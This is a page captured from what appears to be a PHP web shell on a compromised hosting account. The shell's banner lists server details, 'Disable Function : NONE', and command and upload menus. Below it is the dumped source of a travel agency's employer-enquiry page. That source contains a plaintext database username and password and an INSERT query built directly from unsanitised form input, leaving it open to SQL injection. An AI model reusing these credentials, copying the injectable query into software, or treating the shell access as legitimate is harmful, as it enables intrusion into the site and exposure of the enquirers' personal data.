Server IP : 103.53.40.154 / Your IP : 18.119.141.115 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/alkareemtravel.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $servername = "localhost"; $username = "alkareem_alkareemtravel"; $password = ",e@hnr0KQ8_x"; $dbname = "alkareem_alkareemtravel"; // Create connection $conn = new mysqli($servername, $username, $password, $dbname); if(isset($_POST['save'])) { $enquiry_name=$_POST['enquiry_name']; $enquiry_com=$_POST['enquiry_com']; $enquiry_source=$_POST['enquiry_source']; $enquiry_mobile=$_POST['enquiry_mobile']; $enquiry_email=$_POST['enquiry_email']; $enquiry_detail=$_POST['enquiry_detail']; $enquiry_add_date=date("Y/m/d"); $sql="INSERT INTO `tbl_enquiry` (enquiry_name, enquiry_com,enquiry_source, enquiry_mobile, enquiry_email, enquiry_detail,enquiry_add_date) VALUES ('$enquiry_name', '$enquiry_com','$enquiry_source', '$enquiry_mobile', '$enquiry_email', '$enquiry_detail','$enquiry_add_date')"; $query_run = mysqli_query($conn,$sql); if ($query_run) { // $msg="Your Message Send Successfully"; echo "<script>alert('Successfully Submitted'); window.location = 'employers.php';</script>"; } else { echo "Your record not created"; } // print_r($sql); // die(); // $query = "insert into `cvdet` (`name`,`email`,`phone`,`location`,`images`) VALUES ('$name','$email','$phone','$location','$images') "; // $query_run = mysqli_query($conn,$query); // if($query_run){ // echo "products add done"; // }else{ // echo "products not add"; // } } ?> <?php include('includes/dbsmain.inc.php'); ?> <!DOCTYPE html> <html lang="en"> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Al Kareem Travel</title> <meta name="keywords" content=""/> <meta name="description" content=""> <meta name="author" content="Al Kareem Travel"> <LINK REL="SHORTCUT ICON" HREF="favicon1.ico"> <link rel="stylesheet" href="css/bootstrap.min.css" /> <link rel="stylesheet" href="css/font-awesome.min.css" /> <link rel="stylesheet" href="css/owl.carousel.css" /> <link rel="stylesheet" href="css/owl.theme.css" /> <link rel="stylesheet" href="css/magnific-popup.css" /> <link rel="stylesheet" href="css/fonts.css" /> <link rel="stylesheet" href="css/style.css" /> <script src="https://smtpjs.com/v3/smtp.js"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <script> $(function(){ $("#header-follow-us-link-section").load("header-social-media-link.html"); $("#footer-follow-us-link-section").load("footer-social-media-link.html"); }); </script> </head> <!--hidden-sm hidden-xs--> <body> <div class="body"> <?php include('header.php');?> <div class="main"> <section class="about-us"> <div class="container"> <div class="row"> <div class="col-md-12 palovit-title"> <hr class="hr"> <h2 style="color:#FFF">Employers</h2> <p style="color:#FFFFFF; max-width:700px;">Organizations both large and small are largely hiring services of Al Kareem Travel to provide them with outsourced manpower. They no longer want to get into the hassles and the long process of recruiting.</p > </div> <div> </div> </div> </div> </section> <!-- Slider end here --> <section class="news3 border-top p-t-30 p-b-50"> <div class="row clearfix"> <div class="col-md-12 palovit-title"> <h2 style="text-align:left">Employer</h2> <hr class="hr clear" / style="float:left;"> </div> <br><br><br> <div><p style="padding:0px 100px">Outsourcing of manpower has become a common practice with companies nowadays. There is always a requirement of professionally qualified and skilled staff in any organization. With the increasing demands of the industry, there is not enough time to get into the complexities of selecting a candidate. This is where outsourcing of manpower comes in.<br><br> As you look to hire employees in Saudi Arabia, here are some common regulations you’ll need to know to create a compliant contract, as well as how an employer of record and PEO can provide support for your unique HR need.<br><br> Organizations both large and small are largely hiring services of Al Kareem Travel to provide them with outsourced manpower. They no longer want to get into the hassles and the long process of recruiting </p></div> </div> <div class="container"> <div class="row clearfix"> <section class="projets3 p-t-30 p-b-50"> <div class="row"> <div class="container"> <div class="row"> <div class="col-md-12 col-sm-12"> <div class="col-md-12 palovit-title mt-5"> <h2 style="text-align:left"></h2> </div> <div class="col-md-12 no_leftpadding no_rightpadding"> <div class="col-md-12 palovit-title"> <!--<h4 style="text-align:left"></h4>--> </div> <div class="row"> <h3 style="text-align:center;" ><?=$msg?></h3> <div class="col-md-12 text-center"> <div class="col-md-3"></div> <div class="col-md-6 col-sm-6 offset-3"> <form id="frmbookingreques" action="employers_mail.php" method="POST"> <div class="form-group"> <input type="text" class="validate[required] form-control" required id="sender_name" name="enquiry_name" placeholder="Name *"> </div> <!--<div class="form-group">--> <!-- <input type="text" class="validate[required] form-control" required id="" name="enquiry_com" placeholder="Company Name *">--> <!--</div>--> <div class="form-group"> <input type="number" class="validate[required] form-control" required id="sender_mobile" name="enquiry_mobile" placeholder="Contact Number *"> </div> <!--<button type="submit" class="btn btn-primary">Login</button>--> <div class="form-group"> <input type="text" required class="validate[required,custom[email]] form-control" id="email" name="enquiry_email" placeholder="Email *"> </div> <!--<div class="form-group">--> <!-- <select class="form-control" id="enquiry_type" name="enquiry_type">--> <!-- <option value="Umrah">Umrah</option>--> <!-- <option value="Hajj">Hajj</option>--> <!--<option value="Ramadan">Ramadan</option>--> <!-- </select>--> <!--</div>--> <div class="form-group"> <input type="hidden" required id="source" name="enquiry_source" value ="Employer Form" readonly> </div> <div class="form-group"> <textarea type="text" cols="0" rows="5" class="validate[required,maxSize[255]] form-control" name="enquiry_detail" id="sender_message" placeholder="Your Detail Required (if any quiry) *"></textarea> </div> <div class="form-group"> <input type="submit" id="btnbookingreq" name="save" class="btn btn-success" value="SUBMIT"> </div> </form> </div> <div class="col-md-3"></div> </div> </div> <div class="clear"></div> </div> </div> </div> </div> </div> </section> </div> </div> </section> <?php include('footer.php');?> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-147438744-1'); </script> </div> <script src="js/jquery-3.1.1.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/isotope.pkgd.min.js"></script> <!-- <script src="js/owl.carousel.min.js"></script>--> <script src="js/jquery.magnific-popup.min.js"></script> <script> $('ul.nav li.dropdown').hover(function() { $(this).find('.dropdown-menu').stop(true, true).delay(200).fadeIn(200); }, function() { $(this).find('.dropdown-menu').stop(true, true).delay(200).fadeOut(200); }); </script> <script src="js/Script.js"></script> </body> </html>